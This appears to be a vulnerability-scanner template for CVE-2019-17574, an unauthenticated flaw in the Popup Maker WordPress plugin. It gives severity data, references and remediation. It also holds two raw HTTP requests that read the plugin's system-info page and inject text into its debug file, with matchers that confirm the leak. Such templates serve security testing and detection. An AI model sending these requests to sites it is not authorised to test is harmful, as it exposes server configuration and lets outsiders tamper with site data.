id: 'CVE-2019-17574' info: name: Popup-Maker < 1.8.12 - Broken Authentication author: DhiyaneshDK severity: critical description: | An issue was discovered in the Popup Maker plugin before 1.8.13 for WordPress. An unauthenticated attacker can partially control the arguments of the do_action function to invoke certain popmake_ or pum_ methods, as demonstrated by controlling content and delivery of popmake-system-info.txt (aka the "support debug text file"). remediation: | Update Popup-Maker plugin to version 1.8.12 or later. reference: - https://wpscan.com/vulnerability/9907 - https://web.archive.org/web/20191128065954/https://blog.redyops.com/wordpress-plugin-popup-maker/ - https://nvd.nist.gov/vuln/detail/CVE-2019-17574 - https://github.com/PopupMaker/Popup-Maker/blob/master/CHANGELOG.md - https://wpvulndb.com/vulnerabilities/9907 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: 'CVE-2019-17574' cwe-id: CWE-639 epss-score: 0.12099 epss-percentile: 0.94812 cpe: cpe:2.3:a:code-atlantic:popup_maker:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: code-atlantic product: popup_maker framework: wordpress publicwww-query: "/wp-content/plugins/popup-maker/" tags: wpscan,cve,cve2019,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic http: - raw: - | GET /?pum_action=tools_page_tab_system_info HTTP/1.1 Host: {{Hostname}} - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded popmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574 matchers-condition: and matchers: - type: word part: body_1 words: - 'Popup Maker Configuration' - 'Webserver Configuration' condition: and - type: word part: body_2 words: - 'CVE-2019-17574' # digest: 4a0a00473045022027a1c92d3e9511130113756a25d60369e51876e282799f427831820d623b9bce022100e04476dcaa4aa47c41705ed3935f698088f461b21088b48e2970cdabb99fa75b:922c64590222798bb761d5b6d8e72950